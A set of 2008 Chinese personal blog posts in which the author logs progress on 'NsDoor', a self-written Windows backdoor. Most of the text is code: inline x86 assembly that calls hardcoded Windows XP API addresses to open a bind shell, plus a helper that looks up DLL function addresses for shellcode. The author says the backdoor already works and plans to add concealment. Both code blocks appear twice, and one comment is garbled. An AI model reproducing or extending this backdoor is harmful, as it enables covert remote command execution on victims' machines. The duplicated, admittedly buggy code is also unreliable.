循环渐进NsDoor(小结)
NsDoor还有很多要改进的地方,例如客户端肯定要用MFC写出来,然后是动态生成服务端,服务端会加入许多的功能代码(这时候就不再shellcode了)
服务端的一些隐藏方法,等等等
我现在想到的就不下十处,但是实在懒得动了,我要为开学做准备了,多出去耍下啦
可以肯定的是,这个东西我还会继续向下写,以后会逐步完善,我很喜欢信息安全方面的开发,所以我很喜欢这个东西
今天好累啊
发表于:2008年8月14日 21时42分14秒来源:阅读(6)评论(0) 举报本文链接:http://user.qzone.qq.com/381002948/blog/1218721334
今天好累啊
今天超不爽,加上昨天都花了两天测试代码了,结果管道通信还是有问题,日啊,网上的代码都是错的,还都错在管道通信上,大家都擅长搞伪科学... 眼好酸,今天懒得更了...
明天再搞不来我就闭关....
今天在OUKU网购了6122C,希望收获个愉快...heihei
想回学校了...
下个学期我要做好学生,啊哈哈
千辛万苦
发表于:2008年8月20日 16时29分17秒来源:阅读(4)评论(0) 举报本文链接:http://user.qzone.qq.com/381002948/blog/1219220957
千辛万苦
push ebp; sub esp, 80;
mov ebp,esp;
装虚拟机费了我一天半的时间,最终通过代理可以上网,但是城市热点DR.COM是防代理的,我回学校还得重新想办法,虚拟机打开后然后远程管理速度很不错的说
同时开两个VS05调试都不卡
今天跟代码跟的头疼,再也不写了...
汇编或多问题,本来就不太懂汇编,然后写代码时无法给ebp找到正确的地址,头疼
现在代码可以运行,但是得不到正确的结果,也就是后门可以使用,随便贴些 代码,明天继续修改
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
int main()
{
__asm
{
push ebp;
sub esp, 80;
mov ebp,esp;
}
/* mov eax,0x7C81D827
mov [ebp+4], eax; CreatePipe
mov eax,0x7C80236B
mov [ebp+8], eax; CreateProcessA
mov eax,0x7C860817
mov [ebp+12], eax; PeekNamedPipe
mov eax,0x7C810E17
mov [ebp+16], eax; WriteFile
mov eax,0x7C801812
mov [ebp+20], eax; ReadFile
mov eax,0x7C81CAFA
mov [ebp+24], eax; ExitProcess
mov eax,0x71A26A55
mov [ebp+28], eax; WSAStartup
mov eax,0x71A24211
mov [ebp+32], eax; socket
mov eax,0x71A24480
mov [ebp+36], eax; bind
mov eax,0x71A28CD3
mov [ebp+40], eax; listen
mov eax,0x71A31040
mov [ebp+44], eax; accept
mov eax,0x71A24C27
mov [ebp+48], eax; send
mov eax,0x71A2676F
mov [ebp+52], eax; recv
mov eax,0x0
mov [ebp+56],0
mov [ebp+60],0
mov [ebp+64],0
mov [ebp+68],0
mov [ebp+72],0
}*/
//WSADATA ws;
//WSAStartup(0x202,&ws);
_asm
{
LWSAStartup:
; WSAStartup(0x202, DATA)
add esp,168
push esp
push 0x202
mov eax,0x71A26A55
call eax
}
_asm
{
socket:
;socket(2,1,6)
push 6
push 1
push 2
mov eax,0x71A24211
call eax
mov ebx, eax ; save socket to ebx
LBind:
;bind(listenFD,(sockaddr *)&server,sizeof(server));
xor edi,edi
push edi
push 0x0012
mov eax,0x00150000
push eax ; port 830 AF_INET
mov esi, esp
push 0x10 ; length
push esi ; &server
push ebx ; socket
mov eax,0x71A24480
call eax; bind
LListen:
;listen(listenFD,2)
inc edi
inc edi
push edi ;2
push ebx ;socket
mov eax,0x71A28CD3
call eax;listen
LAccept:
;accept(listenFD,(sockaddr *)&server,&iAddrSize)
push 0x10
lea edi,[esp]
push edi
push esi ;&server
push ebx ;socket
mov eax,0x71A31040
call eax ;accept
mov ebx, eax ;save newsocket to ebx
Createpipe1:
;CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0);
xor edi,edi
inc edi
push edi
xor edi,edi
push edi
push 0xc ;pipeattr
mov esi, esp
push edi ;0
push esi ;pipeattr1
lea eax, [ebp+60] ;&hWritePipe1
push eax
lea eax, [ebp+56] ;&hReadPipe1
push eax
mov eax,0x7C81D827
call eax
CreatePipe2:
;CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0);
push edi ;0
push esi ;pipeattr2
lea eax,[ebp+68] ;hWritePipe2
push eax
lea eax, [ebp+64] ;hReadPipe2
push eax
mov eax,0x7C81D827
call eax
CreateProcess:
/*;ZeroMemory TARTUPINFO,10h PROCESS_INFORMATION 44h
sub esp, 0x80
lea edi, [esp]
xor eax, eax
push 0x80
pop ecx
rep stosd //清空s?弞, 鮂F鮂F?? i*/
;si.dwFlags
lea edi,[esp]
mov eax, 0x0101
mov [edi+2ch], eax;
;si.hStdInput = hReadPipe2 ebp+64
mov eax,[ebp+64]
mov [edi+38h],eax
;si.hStdOutput si.hStdError = hWritePipe1 ebp+60
mov eax,[ebp+60]
mov [edi+3ch],eax
mov eax,[ebp+60]
mov [edi+40h],eax
;cmd.exe
mov eax, 0x00646d63
mov [edi+64h],eax ;cmd
;CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation)
lea eax, [esp+44h]
push eax ;&pi
push edi ;&si
push ecx ;0
push ecx ;0
push ecx ;0
inc ecx
push ecx ;1
dec ecx
push ecx ;0
push ecx ;0
lea eax,[edi+64h] ;"cmd"
push eax
push ecx ;0
mov eax,0x7C80236B
call eax
loop1:
;while1
;PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
sub esp,400h ;
mov esi,esp ;esi = Buff
xor ecx, ecx
push ecx ;0
push ecx ;0
lea edi,[ebp+72] ;&lBytesRead
push edi
mov eax,400h
push eax ;1024
push esi ;Buff
mov eax,[ebp+56]
push eax ;hReadPipe1
mov eax,0x7C801812
call eax
mov eax,[edi]
test eax,eax
jz recv_command
send_result:
;ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx ;0
push edi ;&lBytesRead
push [edi] ;hReadPipe1
push esi ;Buff
push [ebp+56] ;hReadPipe1
mov eax,0x7C801812
call eax
;send(clientFD,Buff,lBytesRead,0)
xor ecx,ecx
push ecx ;0
push [edi] ;lBytesRead
push esi ;Buff
push ebx ;clientFD
call [ebp+48]
jmp loop1
recv_command:
;recv(clientFD,Buff,1024,0)
xor ecx,ecx
push ecx
mov eax,400h
push eax
push esi
push ebx
mov eax,0x71A2676F
call eax
//lea ecx,[edi]
mov [edi],eax
;WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx
push edi
push [edi]
push esi
push [ebp+68]
mov eax,0x7C810E17
call eax
jmp loop1
end:
#pragma comment(lib,"Ws2_32")
int main()
{
__asm
{
push ebp;
sub esp, 80;
mov ebp,esp;
}
/* mov eax,0x7C81D827
mov [ebp+4], eax; CreatePipe
mov eax,0x7C80236B
mov [ebp+8], eax; CreateProcessA
mov eax,0x7C860817
mov [ebp+12], eax; PeekNamedPipe
mov eax,0x7C810E17
mov [ebp+16], eax; WriteFile
mov eax,0x7C801812
mov [ebp+20], eax; ReadFile
mov eax,0x7C81CAFA
mov [ebp+24], eax; ExitProcess
mov eax,0x71A26A55
mov [ebp+28], eax; WSAStartup
mov eax,0x71A24211
mov [ebp+32], eax; socket
mov eax,0x71A24480
mov [ebp+36], eax; bind
mov eax,0x71A28CD3
mov [ebp+40], eax; listen
mov eax,0x71A31040
mov [ebp+44], eax; accept
mov eax,0x71A24C27
mov [ebp+48], eax; send
mov eax,0x71A2676F
mov [ebp+52], eax; recv
mov eax,0x0
mov [ebp+56],0
mov [ebp+60],0
mov [ebp+64],0
mov [ebp+68],0
mov [ebp+72],0
}*/
//WSADATA ws;
//WSAStartup(0x202,&ws);
_asm
{
LWSAStartup:
; WSAStartup(0x202, DATA)
add esp,168
push esp
push 0x202
mov eax,0x71A26A55
call eax
}
_asm
{
socket:
;socket(2,1,6)
push 6
push 1
push 2
mov eax,0x71A24211
call eax
mov ebx, eax ; save socket to ebx
LBind:
;bind(listenFD,(sockaddr *)&server,sizeof(server));
xor edi,edi
push edi
push 0x0012
mov eax,0x00150000
push eax ; port 830 AF_INET
mov esi, esp
push 0x10 ; length
push esi ; &server
push ebx ; socket
mov eax,0x71A24480
call eax; bind
LListen:
;listen(listenFD,2)
inc edi
inc edi
push edi ;2
push ebx ;socket
mov eax,0x71A28CD3
call eax;listen
LAccept:
;accept(listenFD,(sockaddr *)&server,&iAddrSize)
push 0x10
lea edi,[esp]
push edi
push esi ;&server
push ebx ;socket
mov eax,0x71A31040
call eax ;accept
mov ebx, eax ;save newsocket to ebx
Createpipe1:
;CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0);
xor edi,edi
inc edi
push edi
xor edi,edi
push edi
push 0xc ;pipeattr
mov esi, esp
push edi ;0
push esi ;pipeattr1
lea eax, [ebp+60] ;&hWritePipe1
push eax
lea eax, [ebp+56] ;&hReadPipe1
push eax
mov eax,0x7C81D827
call eax
CreatePipe2:
;CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0);
push edi ;0
push esi ;pipeattr2
lea eax,[ebp+68] ;hWritePipe2
push eax
lea eax, [ebp+64] ;hReadPipe2
push eax
mov eax,0x7C81D827
call eax
CreateProcess:
/*;ZeroMemory TARTUPINFO,10h PROCESS_INFORMATION 44h
sub esp, 0x80
lea edi, [esp]
xor eax, eax
push 0x80
pop ecx
rep stosd //清空s?弞, 鮂F鮂F?? i*/
;si.dwFlags
lea edi,[esp]
mov eax, 0x0101
mov [edi+2ch], eax;
;si.hStdInput = hReadPipe2 ebp+64
mov eax,[ebp+64]
mov [edi+38h],eax
;si.hStdOutput si.hStdError = hWritePipe1 ebp+60
mov eax,[ebp+60]
mov [edi+3ch],eax
mov eax,[ebp+60]
mov [edi+40h],eax
;cmd.exe
mov eax, 0x00646d63
mov [edi+64h],eax ;cmd
;CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation)
lea eax, [esp+44h]
push eax ;&pi
push edi ;&si
push ecx ;0
push ecx ;0
push ecx ;0
inc ecx
push ecx ;1
dec ecx
push ecx ;0
push ecx ;0
lea eax,[edi+64h] ;"cmd"
push eax
push ecx ;0
mov eax,0x7C80236B
call eax
loop1:
;while1
;PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
sub esp,400h ;
mov esi,esp ;esi = Buff
xor ecx, ecx
push ecx ;0
push ecx ;0
lea edi,[ebp+72] ;&lBytesRead
push edi
mov eax,400h
push eax ;1024
push esi ;Buff
mov eax,[ebp+56]
push eax ;hReadPipe1
mov eax,0x7C801812
call eax
mov eax,[edi]
test eax,eax
jz recv_command
send_result:
;ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx ;0
push edi ;&lBytesRead
push [edi] ;hReadPipe1
push esi ;Buff
push [ebp+56] ;hReadPipe1
mov eax,0x7C801812
call eax
;send(clientFD,Buff,lBytesRead,0)
xor ecx,ecx
push ecx ;0
push [edi] ;lBytesRead
push esi ;Buff
push ebx ;clientFD
call [ebp+48]
jmp loop1
recv_command:
;recv(clientFD,Buff,1024,0)
xor ecx,ecx
push ecx
mov eax,400h
push eax
push esi
push ebx
mov eax,0x71A2676F
call eax
//lea ecx,[edi]
mov [edi],eax
;WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx
push edi
push [edi]
push esi
push [ebp+68]
mov eax,0x7C810E17
call eax
jmp loop1
end:
休息一下
发表于:2008年8月18日 21时40分22秒来源:阅读(7)评论(0) 举报本文链接:http://user.qzone.qq.com/381002948/blog/1219066822
休息一下
这两天貌似很忙很累 我的6122c来了....
而且vista越讨厌,根本不适合写程序...
跟内存很费时...
我好累
dep好烦
随便贴点代码:
//address.cpp
#include<iostream>
#include<windows.h>
using namespace std;
typedef void (*MYPROC)(LPWSTR);
int main()
{
char adrStr[200];
HINSTANCE LibHandle;
MYPROC ProcAdd;
cout<<" Function Address Hunter "<<endl;
while(true)
{
cout<<"The Dll name:";
cin>>adrStr;
LibHandle = LoadLibraryA(adrStr);
cout<<LibHandle<<endl<<endl;
cout<<"Function Name:";
cin>>adrStr;
while(strncmp(adrStr,"exit",4) != 0)
{
ProcAdd = (MYPROC)GetProcAddress(LibHandle,adrStr);
cout<<ProcAdd<<endl;
cout<<"Function Name:";
cin>>adrStr;
}
}
return 0;
}
#include<iostream>
#include<windows.h>
using namespace std;
typedef void (*MYPROC)(LPWSTR);
int main()
{
char adrStr[200];
HINSTANCE LibHandle;
MYPROC ProcAdd;
cout<<" Function Address Hunter "<<endl;
while(true)
{
cout<<"The Dll name:";
cin>>adrStr;
LibHandle = LoadLibraryA(adrStr);
cout<<LibHandle<<endl<<endl;
cout<<"Function Name:";
cin>>adrStr;
while(strncmp(adrStr,"exit",4) != 0)
{
ProcAdd = (MYPROC)GetProcAddress(LibHandle,adrStr);
cout<<ProcAdd<<endl;
cout<<"Function Name:";
cin>>adrStr;
}
}
return 0;
}
明天再说
上面是我写NsDoor的心情记录,感觉真的很累,过段时间再继续。。。。
我快要回重庆了,这么多天一直为了这个NsDoor付出了很多时间,很多精力,现在一debug就有恶心的感觉
NsDoor还有很多要改进的地方,例如客户端肯定要用MFC写出来,然后是动态生成服务端,服务端会加入许多的功能代码(这时候就不再shellcode了)
服务端的一些隐藏方法,等等等
我现在想到的就不下十处,但是实在懒得动了,我要为开学做准备了,多出去耍下啦
可以肯定的是,这个东西我还会继续向下写,以后会逐步完善,我很喜欢信息安全方面的开发,所以我很喜欢这个东西
加油,新学期,加油!!!
---------------------by NewSketcher
Time: 080822 22:08
